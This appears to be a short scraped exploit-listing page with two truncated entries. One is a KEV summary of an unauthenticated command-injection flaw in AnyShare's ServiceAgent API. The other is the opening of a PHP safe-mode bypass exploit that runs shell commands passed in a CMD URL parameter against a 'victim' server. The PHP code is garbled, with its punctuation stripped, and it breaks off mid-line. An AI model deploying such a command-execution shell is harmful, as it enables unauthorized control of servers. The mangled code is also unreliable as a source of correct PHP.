VulnCheck KEV: CVE-2025-34160

AnyShare contains a critical unauthenticated remote code execution vulnerability in the ServiceAgent API exposed on port 10250. The endpoint /api/ServiceAgent/startservice accepts user-supplied input via POST and fails to sanitize command-like payloads. An attacker can inject shell syntax that is...

PHP Safe_mode bypass exploit (win32service)

?php PHP Safemode bypass exploit win32service Note: Tested on 5.2.1 Author: NetJackal Email: nima501atyahoodotcom Website: http://netjackal.by.ru Usage: http://victim.net/nj.php?CMD=command $command=isset$GET'CMD'?$GET'CMD':'dir'; cammand $dir=iniget'uploadtmpdir'; Directory to store command's...